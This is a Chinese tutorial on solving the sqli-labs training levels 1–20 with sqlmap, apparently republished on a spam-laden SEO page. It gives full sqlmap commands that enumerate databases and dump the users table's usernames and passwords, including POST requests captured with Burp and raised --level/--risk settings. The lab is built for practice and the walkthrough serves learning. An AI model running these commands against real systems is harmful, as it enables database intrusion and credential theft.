当前位置: 首页 > news >正文

衡水专业网站建设公司色盲测试图片

衡水专业网站建设公司,色盲测试图片,企业网站制作排名,注册网站电子游戏送钱了38这个星期我们用手动注入打了前20关靶场,今天我们用sqlmap直接梭哈前20关 1.介绍sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。 2.下载和使用sqlmap 官方下载地址:GitHub - sq…

这个星期我们用手动注入打了前20关靶场,今天我们用sqlmap直接梭哈前20关

1.介绍sqlmap

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。

2.下载和使用sqlmap

官方下载地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

下载压缩包,之后解压

那怎么使用呢???

打开sqlmap被解压到的地方,我解压到了F盘

直接在红色筐子里输入cmd,即可打开窗口使用sqlmap

3.sqlmap基本语法

sqlmap是由python写成

使用方法:python sqlmap.py -参数

常用用法

1.-h

-h是显示基本用法

语法:python sqlmap.py -h

2. -u

-u是基础参数,后面跟需要测试的URL,常用于GET类型的注入

语法:python sqlmap.py -u "URL"

3.--batch

--batch是,可以在所有需要用户手动输入的的部分(通常是询问执行yes还是no【样子是[Y/n]】),执行默认操作,不需要用户再输入

语法:python sqlmap.py -u "URL" --batch

4.--level 等级

--level是,测试等级,等级越高,测试越复杂,共有五级,当默认集数测试不出来时。可以提高等级。

语法:python sqlmap.py -u "URL" --level

其余我们在做中介绍。

4.解题

Less-1——Less-10(GET类型)

前十关解法相同,以第一关为例

1.库名  --dbs 查询库名

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -dbs

 

2.表名   -D 表名 --tables 查询表名

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security --tables

3.列名  -D 表名 -T 列名 --columns 查询列名

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users --columns

4.字段  -D 表名 -T 列名 -C 字段 --dump 查询字段

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users -C username,password --dump

 

要是这几关有的查询不出来,记得还有--level 等级,等级提升这一操作

Less-11——Less-17(POST基础注入)

从11关开始就需要bp抓包啦

创建一个文本文档在sqlmap文件夹中,将POST报文保存在文本文档中!

-r 代表文档

语法:python sqlmap.py -r 文本文档

1.库名

python sqlmap.py -r 11.txt --batch -dbs

 

2.表名

python sqlmap.py -r 11.txt --batch -D security --tables

 

3.列名

python sqlmap.py -r 11.txt --batch -D security -T users --columns

 

4.字段

python sqlmap.py -r 11.txt --batch -D security -T users -C username,password --dump

 

Less15-17这几关sqlmap跑的特别慢,大家耐心等待,17关记得输入一个用户名再抓包!

Less18——Less20

这几关会发现爆表爆不出来

提示让用--level --risk 前面介绍 level了,那什么是risk呢?

“risk”参数用于控制攻击的深度,数值越高,攻击的幅度越大,但也会增加攻击被发现的风险;

//库名

python sqlmap.py -r 18.txt --batch -dbs --level=3 --risk=3

 之后操作也是一样的!!!

工具注入还是十分方便,但是还是得熟练手工注入!!!! 

http://www.dinnco.com/news/37383.html

相关文章:

  • 分类信息网站如何优化代刷网站推广
  • 自己做个公司网站怎样在百度上做广告推广
  • 做网站起名字网站推广手段
  • 产品推广网站模板网推放单平台
  • 有效的网站建设公司小程序定制开发公司
  • 潞电建设公司官网百度怎么做关键词优化
  • 网站提交入口win7系统优化软件
  • iis 新建网站 要登录国内seo服务商
  • 石家庄西晨网站开发网络建站平台
  • 怎么建设大淘客网站seo快速优化
  • 网站建设及推广方案ppt广州网络推广公司排名
  • 国内公司网站模板百度站长联盟
  • wordpress 个人站关键词点击优化工具
  • 嘉兴网站推广公司网店如何引流与推广
  • 什么网站免费做简历模板深圳正规seo
  • 网站建设的品牌seo排名系统
  • 公司网站的意义云南网站建设快速优化
  • 做网站好不好百度一下你就知道官网网址
  • 怎样查看网站是用什么cms_做的如何优化seo
  • 东莞电子产品网站建设推广关键词优化
  • 网站底部分享怎么做好搜seo软件
  • 毕业设计做网站怎么样seo怎么读
  • 鹤壁集团网站建设黑帽seo培训网
  • 湖南省公司注册网站seo标题优化是什么意思
  • 自建wap网站微博推广
  • 代码开源网站武汉seo 网络推广
  • 香港人做evus在哪个网站seo网站排名助手
  • 杭州电子商务网站建设搜索引擎优化分析
  • 公司做网站需要b2b平台免费推广网站
  • 东莞市主营网站建设服务机构全国教育培训机构平台